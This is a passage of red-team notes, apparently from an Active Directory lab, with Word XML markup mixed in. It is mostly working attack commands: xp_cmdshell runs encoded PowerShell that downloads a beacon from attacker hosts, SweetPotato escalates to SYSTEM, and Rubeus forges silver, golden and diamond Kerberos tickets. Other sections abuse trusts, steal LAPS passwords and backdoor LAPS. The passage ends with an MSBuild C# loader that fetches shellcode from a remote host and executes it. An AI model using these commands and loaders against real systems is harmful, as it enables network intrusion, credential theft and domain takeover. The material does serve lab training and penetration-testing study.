SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHAAaQB2AG8AdAAnACkAKQA='"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sql-2 -Query 'exec master..xp_cmdshell "whoami"' -QueryTarget eu-sql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sql-2 -Query "EXEC xp_cmdshell 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADkAOgA4ADAALwBhACcAKQApAA=='" -QueryTarget eu-sql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 FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHAAaQB2AG8AdAAyACIAKQA=''')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MSSQL Server - Lateral Movement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MSSQL Server - Lateral Movement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1-a. Find the linked SQL Servers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"sql-2.dev.cyberbotic.io,1433"</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"sql-2.dev.cyberbotic.io,1433" -Query "select @@version"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1-b. Execute query on the linked server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execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /auth:wintoken </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/host:sql-2.dev.cyberbotic.io /l:sql-1.cyberbotic.io /module:lquery /c:"select @@version"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Check if xp_cmdshell is already enabled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/auth:wintoken /host:sql-2.dev.cyberbotic.io /l:sql-1.cyberbotic.io /module:lquery /c:"SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell'"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Check if target SQLServer or its linked Server have syadmin access. (0 -&gt; Not SysAdmin , 1-&gt; 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/auth:wintoken /host:sql-2.dev.cyberbotic.io /l:sql-1.cyberbotic.io /module:lwhoami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"sql-2.dev.cyberbotic.io,1433" -Query "SELECT SYSTEM_USER;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SYSTEM_USER;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 FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');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 FROM OPENQUERY("sql-1.cyberbotic.io",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"sql-2.dev.cyberbotic.io,1433" -Query "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"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/auth:wintoken /host:sql-2.dev.cyberbotic.io /module:info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Enumerate for What roles we do have.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/h:sql-2.dev.cyberbotic.io,1433 /m:whoami</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4-a. If syadmin access is enabled then , We can just execute command by enabling the xp_cmdshell, executing command and then disabling it.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sp_configure 'Show Advanced Options', 1; RECONFIGURE;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sp_configure 'xp_cmdshell', 1; RECONFIGURE;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EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT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EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]</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sql-2 -Query "sp_configure 'Show Advanced Options', 1; RECONFIGURE;" -QueryTarget eu-sql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sql-2 -Query "sp_configure 'xp_cmdshell', 1; RECONFIGURE;" -QueryTarget eu-sql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Get-SQLServerLinkCrawl -Instance sql-2 -Query 'exec master..xp_cmdshell "whoami"' -QueryTarget eu-sql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4-b. Check if we can impersonate any user, and then check if that user have sysadmin role.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execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:impersonate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C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:iwhoami /i:DEV\mssql_svc</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#5. Now run powershell payload / execute cradle to get the beacon.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Follow point 6 of above Command Execution in MSSQL Notes.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Get-SQLServerLinkCrawl -Instance sql-2 -Query "EXEC xp_cmdshell 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADkAOgA4ADAALwBhACcAKQApAA=='" -QueryTarget eu-sql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SQL&gt; SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHAAaQB2AG8AdAAyACIAKQA=''')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MSSQL Server - Privilege Escalation</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MSSQL Server : Privilege Escalation - Service Account (SeImpersonate) to System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The built-in service account that runs the MSSQL DB Service has the SeImpersonate Privilege by Default. This privilege can potentially be exploited to gain local admin access (System) using the SweetPotato exploit.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After getting beacon to any initial or linked SQL Server , We can Priv Esc to  that server.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Use seatbelt utility to identify the privilege tokens available</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getuid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shell whoami /priv</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TokenPrivileges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If seimpersonate privilege is found, we can use it to impersonate system account.</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C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges</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shell whoami /priv</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Use sweet potato exploit to get system shell</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Encoded Powershell payload</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powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGk</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADkAOgA4ADAALwBhACcAKQApAA==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execute sweet potato to get reverse shell/beacon as system user</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C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADkAOgA4ADAALwBhACcAKQApAA=="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>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connect localhost 4444</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Domain Dominance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Silver Ticket (offline)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Dump the machine hash using mimikatz (Service from 0 - hash)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!sekurlsa::ekeys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!sekurlsa::logonpasswords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Generate the silver Ticket TGS offline using Rubeus (use /rc4 flag for NTLM hash)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 -Domain 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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523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3. Inject the ticket and Verify the access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/ticket:doIFXD[...]MuaW8=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5668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\\wkstn-1.dev.cyberbotic.io\c$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jump psexec64 wkstn-1.dev.cyberbotic.io smb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Obtain more Service Tickets and inject (/ptt) into the sacrificial process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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:HOST/wkstn-1.dev.cyberbotic.io /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523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ptt /ticket:&lt;TGS-TICKET&gt;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klist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5. Different Services required for different uses. (For more - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket#silver-ticket)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psexec |  CIFS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winrm  |  HOST &amp; HTTP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wmi    | HOST &amp; RPCSS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dcsync (DCs only) | LDAP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Golden Ticket (offline)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Fetch the NTLM/AES hash of krbtgt account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dcsync dev.cyberbotic.io DEV\krbtgt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Generate Golden ticket offline using Rubeus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the domain SID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 -Domain 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Golden Ticket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 -Domain dev.cyberbotic.io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golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523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Inject golden ticket and gain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3-a. For MACHINE TGT : Use Machine TGT fetched to gain RCE on itself using S4U abuse (/self flag)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A machine account TGT ticket if injected will not work probably, So we have to  abuse S4U2SELF to obtain TGS and get access as Local Admin to that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this by injecting the TGT insto a sacrificial process and try to access the files. Check S4U2Self Notes below.</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Generate TGS from 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/impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowrap /ticket:doIFuj[...]lDLklP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TGS in a sacrificial process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3-b. For DOMAIN USER TGT : Inject the ticket and access the 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Diamond Ticket (online)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1. Fetch the SID of User/Machine for which we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ConvertTo-SID dev/nlamb</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dc-2 | select samaccountname,primarygroupid,objectsid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Create Diamond ticket (512 - Enterprise Group ID, krbkey - Hash of KRBRGT account)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diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap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/tgtdeleg : uses the Kerberos GSS-API to obtain a useable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host.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/ticketuser : is the username of the user to impersonate.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/ticketuserid : is the domain RID of that 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/groups : are the desired group RIDs (512 being Domain Admins).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/krbkey : is the krbtgt AES256 hash.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Rubeus describe will now show that this is a TGT for the target user.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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...snip...]MuSU8=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Inject Diamond ticket (TGT) and gain acess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3-a. For MACHINE TGT : Use Machine TGT fetched to gain RCE on itself using S4U abuse (/self flag)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A machine account TGT ticket if injected will not work probably, So we have to  abuse S4U2SELF to obtain TGS and get access as Local Admin to that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this by injecting the TGT insto a sacrificial process and try to access the files. Check S4U2Self Notes below.</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Generate TGS from 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/impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowrap /ticket:doIFuj[...]lDLklP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TGS in a sacrificial process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3-b. For DOMAIN USER TGT : Inject the ticket and access the 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DPERSIST-1 : Forged certificates (DC or CA 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0. Finding Certificate Authorities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execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas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Dump the Private Key and Certificate of CA (run command in DC/CA)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C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates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Save the certificate in .pem file and convert into pfx format using openssl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ubuntu@DESKTOP-3BSK7NO ~&gt; openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx</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Next, use the stolen CA cert to generate fake cert for Domain user/Machine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C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass1231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Encode the certificate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ubuntu@DESKTOP-3BSK7NO ~&gt; cat cert.pfx | base64 -w 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Use the certificate to get TGT for Domain User/Machine or Domain Admin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/user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /password:pass123 /nowrap /certificate:MIACAQ[...snip...]IEAAAA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Inject the ticket (TGT) and access the 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6-A. For MACHINE TGT : Use Machine TGT fetched to gain RCE on itself using S4U abuse (/self flag)</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A machine account TGT ticket if injected will not work probably, So we have to  abuse S4U2SELF to obtain TGS and get access as Local Admin to that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this by injecting the TGT insto a sacrificial process and try to access the files. Check S4U2Self Notes below.</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Generate TGS from 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s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowrap /ticket:doIFuj[...]lDLklP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Inject TGS in a sacrificial process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6-B. For DOMAIN USER TGT : Inject the ticket and access the service.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/ticket:doIFyD[...]MuaW8=</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2664</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\\dc-2.dev.cyberbotic.io\c$</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Forest &amp; Domain Trusts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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Cross Domain Attacks</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PrivEsc : Child (DEV.CYBERBOTIC.IO) to Parent (CYBERBOTIC.IO) within Same Domain via SID History using KrbTGT Hash of Child Domain. (Also possible using Trust Tickets)</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Get the KrbTGT hash, From DC by running Mimikatz or using DCSync Attack.</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!lsadump::dcsync /user:dev\krbtgt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dcsync dev.cyberbotic.io dev\krbtgt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Enumerate the Domain Trusts (Use -Domain attribute to enumerate other domains)</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Get-DomainTrust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Enumerate basic info required for creating forged ticket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the SID of Domain Admin / Enterprise Admin group of parent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 -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid</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Get-DomainSID -Domain "dev.cyberbotic.io"</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Domain controller of parent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Get-DomainController -Domain cyberbotic.io | select Name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Domain Admin of parent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"Domain Admins" -Domain cyberbotic.io | select MemberName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4-a. Use Golden Ticket technique (/sid - SID of the current domain &amp; /sids - SID of Enterprise Admins or Parent Domain Admins &amp; /aes256 - Krbtgt Hash)</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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /sids:S-1-5-21-2594061375-675613155-814674916-512 /nowrap</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4-b. Or, Use Diamond Ticket technique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diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:S-1-5-21-2594061375-675613155-814674916-519 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap</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Inject the ticket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/domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=</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5060</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klist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\\dc-1.cyberbotic.io\c$</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jump psexec64 dc-1.cyberbotic.io smb</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dcsync cyberbotic.io cyber\krbtgt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!lsadump::dcsync /all /domain:cyberbotic.io</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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t>Cross Forest Attacks (Inbound / Outbound)</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Exploiting Inbound Trusts (Users in our domain can access resources in foreign domain)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We can enumerate the foreign domain with inbound trust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Get-DomainTrust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-Domain dev-studio.com -Properties DnsHostName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Check if members in current domain are part of any group in foreign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Enumerate any groups that contain users outside of its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Get-DomainForeignGroupMember -Domain dev-studio.com</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Find-ForeignGroup -Domain dev-studio.com</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Find-ForeignUser -Domain dev-studio.com</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Verify the username from SID returned in previous step</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ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120</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"Studio Admins" | select MemberName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Get-DomainController -Domain dev-studio.com | select Name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Fetch the AES256 hash of Domain user , who have the access or part of the group in foreign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dcsync dev.cyberbotic.io dev\nlamb</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!lsadump::dcsync dev\nlamb /domain:dev.cyberbotic.io</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We can create Inter-Realm TGT for user identified in above steps (/aes256 has users hash)</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Getting TGT using hash</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/user:nlamb /domain:dev.cyberbotic.io /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4 /nowrap</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Getting Inter-Realm TGT for target domain from current domain TGT.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asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /nowrap /ticket:doIFwj[...]MuaW8=</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Getting TGS from inter-realm TGT for Target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asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /nowrap /ticket:doIFoz[...]NPTQ==</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Inject the ticket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/domain:dc-</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>studio.com /username:Administrator /password:FakePass /ticket:doIFLz[...snip...]MuaW8=</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ptt /ticket:doIFLz[...snip...]MuaW8=</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5060</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klist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\\dc.dev-studio.com\c$</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Exploiting Outbound Trusts (Users in other domain can access resources in our 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Enumerate the outbound trust (msp.com) in parent domain (cyberbotic.io)</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Get-DomainTrust -Domain cyberbotic.io</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2. Enumerate the TDO to fetch the shared trust key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"(objectCategory=trustedDomain)" --domain cyberbotic.io --attributes distinguishedName,name,flatName,trustDirection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3-a. # Dump the TDO Object from DC (parent) directly - (Not OPSEC Safe)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hostname</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lsadump::trust /patch</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3-b. OR, Use DCSync to get the ntlm hash of TDO object remotely</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Get-DomainObject -Identity "CN=msp.org,CN=System,DC=cyberbotic,DC=io" | select objectGuid</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mimikatz @lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}</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There is a "trust account" which gets created in trusted domain (msp.com) by the name of trusting domain (CYBER$), it can be impersonated to gain normal user access (/rc4 is the NTLM hash of TDO Object)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Get all the user accounts in the DEV domain, we'll see CYBER$ and STUDIO$, which are the trust accounts for those respective domain trusts.</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"(objectCategory=user)"</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Outbound Domain (MSP domain) will have a trust account (CYBER$), even though we can't enumerate across the trust to confirm it.  This is the account we must impersonate to request Kerberos tickets across the trust.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A user can create Multiple computer objects and later can Abuse them, We have user access in this case, So find some way to abuse it.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/user:CYBER$ /domain:msp.org /rc4:8c0124e706679550bf14182477f7a8dc /nowrap</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Inject the ticket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createnetonly /program:C:\Windows\System32\cmd.exe /domain:MSP /username:CYBER$ /password:FakePass /ticket:doIFLz[...snip...]MuaW8=</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steal_token 5060</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klist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7. We can now use the normal user session, to enumerate the domain. OR We can create Multiple computer objects and later can Abuse them, We have user access in this case, So find some way to abuse it.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"(objectCategory=user)"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Create a Computer Object to abuse it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Get-DomainObject -Identity "DC=dev,DC=cyberbotic,DC=io" -Properties ms-DS-MachineAccountQuota</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You wants to create a new computer object for a different Forest using StandIn Tool, Then Read this blog by Rasta - https://rastamouse.me/getdomain-vs-getcomputerdomain-vs-getcurrentdomain/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Note: StandIn code needs to be modified if you wants to create a Computer in another Domain using --Domain parameter. (https://github.com/FuzzySecurity/StandIn/pull/17)</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beacon&gt; execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make --Domain dev.cyberbotic.io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PS&gt; C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:oIrpupAtF1YCXaw /user:EvilComputer$ /domain:dev.cyberbotic.io</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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:EvilComputer$ /aes256:7A79DCC14E6508DA9536CD949D857B54AE4E119162A865C40B3FFD46059F7044 /nowrap</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8. Perform Few enumerations to get access to the forest.</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Kerberoasting / ASRepRoasting / Set SPN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"(&amp;(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName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Get-DomainUser -SPN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-PreauthNotRequired -Verbose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Find-InterestingDomainAcl -ResolveGUIDs -Domain msp.org | ?{$_.IdentityReferenceName -match "CYBER$"}</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Unconstrained Delegation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-UnConstrained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-UnConstrained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"(&amp;(ObjectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes cn,dnshostname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"(&amp;(ObjectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes cn,dnshostname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Constrained Delegation</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Get-DomainUser -TrustedToAuth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-TrustedToAuth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C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&amp;(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json --domain 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Vulnerable Certificate Templates</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find /vulnerable /domain:msp.org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find /enrolleeSuppliesSubject /domain:msp.org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execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:ad.msp.org\root-ca /template:MSPUserTemplate /altname:Administrator /domain:msp.org</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Certify doesn't work well across outbound trust, So to abuse such attack scenario either we have to modify the Certify or we can use native certreq tool (https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certreq_1).</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For OutBound Forests the Certify fails , So we have to modify it. Or for manually performing this attack using certreq follow belo links.</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For help check this</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[https://github.com/GhostPack/Certify/issues/13#issuecomment-1716046133](https://github.com/GhostPack/Certify/issues/13#issuecomment-1716046133)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>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lastRenderedPageBreak/>
        <w:t>LAPS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Abusing LAPS (Local Administrator Password Solution)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Enumerate for presence of LAPS and GPO Policy implementing the Laps.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1.1 Check if, LAPS client is installed on local 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C:\Program Files\LAPS\CSE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1.2 Check for, Computer Object having ms-Mcs-AdmPwdExpirationTime attribute is set to Not Null.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 ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName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Enumerate GPO which are used to deploy LAPS configurations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2.1 Check for GPOs that have "LAPS" or some other descriptive term in the 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Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath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2.2 Download LAPS configuration (Using name or cn attribute values from Laps GPO)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\\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine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download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol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2.3 Parse the LAPS GPO Policy file downloaded in previous step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Parse-PolFile .\Desktop\Registry.pol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Finding Principals which can read the LAPS Passwords or ms-Mcs-AdmPwd Attribute.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3.1 Search DACL of each computer to find the read rights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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier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ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107</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"DEV\Developers" -Domain dev.cyberbotic.io -Recurse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3.2 Use LAPS Toolkit to find groups that have delegated read rights at OU and Computer level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C:\Tools\LAPSToolkit\LAPSToolkit.ps1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Find-LAPSDelegatedGroups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Get-DomainGroupMember -Identity "DEV\Developers" -Domain dev.cyberbotic.io -Recurse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3.3 Find-AdmPwdExtendedRights goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them.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Find-AdmPwdExtendedRights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Reading LAPS Passwords or ms-Mcs-AdmPwd Attribute and using it to gain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4.1 View the LAPS password for given machine (From User Session having required rights)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powershell-import c:\Tools\PowerSploit\Recon\PowerView.ps1</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wkstn-1 -Properties ms-Mcs-AdmPwd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Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime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4.2 Use the laps password to gain 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make_token .\LapsAdmin 1N3FyjJR5L18za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ls \\wkstn-1\c$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 Modifying Password Expiration Protection for Persistence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5.1 Make sure that LAPS policy settings PwdExpirationProtectionEnabled is not enabled , then only we can set the Password Expiration to a longer time, else it will trigger a password reset.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Parse-PolFile .\Desktop\Registry.pol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5.2 Check the current Expiration time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Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime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5.3 Set Far Future date as expiry (Only machine can set its Password) (Use www.epochconverter.com/ldap)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run hostname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getuid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Set-DomainObject -Identity wkstn-1 -Set @{'ms-Mcs-AdmPwdExpirationTime' = '136257686710000000'} -Verbose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6. LAPS Backdoor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Modify the AdmPwd.PS.dll and AdmPwd.Utils.dll file located at C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS\ location to log the LAPS password everytime it is viewed by the admin user (Chevk Notes)</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AppLocker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Applocker Enumeration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On Local System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1.1 Using powershell on local system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$ExecutionContext.SessionState.LanguageMode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1.2 Enumerate the Applocker policy via Local Windows registry on machine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C:\Users\Administrator&gt; Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2"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C:\Users\Administrator&gt; Get-ChildItem "HKLM:Software\Policies\Microsoft\Windows\SrpV2\Exe"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From any system - Enumerate the Applocker policy via GPO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Get-DomainGPO -Domain dev-studio.com | ? { $_.DisplayName -like "*AppLocker*" } | select displayname, gpcfilesyspath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download \\dev-studio.com\SysVol\dev-studio.com\Policies\{7E1E1636-1A59-4C35-895B-3AEB1CA8CFC2}\Machine\Registry.pol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PS C:\Users\Attacker&gt; Parse-PolFile .\Desktop\Registry.pol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Writable Paths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Navigating Laterally via PSEXEC is fine, as service binary is uploaded in C:\Winodws path which is by default whitelisted.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Find the writable path within C:\winodws to bypass Applocker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Get-Acl C:\Windows\Tasks | fl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3. In the default Applocker Policy , "C:\Windows" and "C:\Program Files" are whitelisted and we can run any binary from there, c:\Windows\Tasks is the directory where any standard user have write permissions.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4. When enumerating the rules, you may also find additional weak rules that system administrators have put in. For example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&lt;FilePathCondition Path="*\AppV\*"/&gt;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LOLBAS to execute arbitrary code or Beacon Payload.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If Applocker is enabled with strict policy, and most of the Binaries are not allowed to execute (like Powershell, External Binaries, Some specific directory binaries etc), then we can use Binaries From LOLBAS Project to execute our shellcode/payload/dll to get beacon.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LOLBAS Project - https://lolbas-project.github.io/#/execute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MSBuild.exe to execute C# code from a .csproj or .xml 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Host http_x64.xprocess.bin via Site Management &gt; Host File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Start execution using command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C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe test.csproj</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3. Contents of test.csproj file, which us using a c# loader to download and execute shellcode.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&lt;Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"&gt;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&lt;Target Name="MSBuild"&gt;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&lt;MSBuildTest/&gt;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&lt;/Target&gt;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&lt;UsingTask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TaskName="MSBuildTest"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TaskFactory="CodeTaskFactory"</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AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" &gt;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&lt;Task&gt;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&lt;Code Type="Class" Language="cs"&gt;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&lt;![CDATA[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using System;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using System.Net;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using System.Runtime.InteropServices;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using Microsoft.Build.Framework;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using Microsoft.Build.Utilities;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public class MSBuildTest :  Task, ITask</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public override bool Execute()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byte[] shellcode;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using (var client = new WebClient())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client.BaseAddress = "http://nickelviper.com";</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shellcode = client.DownloadData("beacon.bin");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 xml:space="preserve">                    var hKernel = LoadLibrary("kernel32.dll");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var hVa = GetProcAddress(hKernel, "VirtualAlloc");</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var hCt = GetProcAddress(hKernel, "CreateThread");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var va = Marshal.GetDelegateForFunctionPointer&lt;AllocateVirtualMemory&gt;(hVa);</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var ct = Marshal.GetDelegateForFunctionPointer&lt;CreateThread&gt;(hCt);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var hMemory = va(IntPtr.Zero, (uint)shellcode.Length, 0x00001000 | 0x00002000, 0x40);</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Marshal.Copy(shellcode, 0, hMemory, shellcode.Length);</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var t = ct(IntPtr.Zero, 0, hMemory, IntPtr.Zero, 0, IntPtr.Zero);</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WaitForSingleObject(t, 0xFFFFFFFF);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return true;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[DllImport("kernel32", CharSet = CharSet.Ansi)]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private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);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[DllImport("kernel32", CharSet = CharSet.Ansi)]</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private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);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[DllImport("kernel32")]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private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);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[UnmanagedFunctionPointer(CallingConvention.StdCall)]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private delegate IntPtr AllocateVirtualMemory(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);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[UnmanagedFunctionPointer(CallingConvention.StdCall)]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private delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);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&lt;/Code&gt;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&lt;/Task&gt;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xml:space="preserve">  &lt;/UsingTask&gt;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&lt;/Project&gt;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Other LOLBAS Binaries that can be used to execute code can be found below</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LOLBAS Project - https://lolbas-project.github.io/#/execute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Using MsEdge.exe to execute beacon ( it will pop a window which will be visible to user, To avoid that we can use --headless msedge)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"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-gpu-sandbox 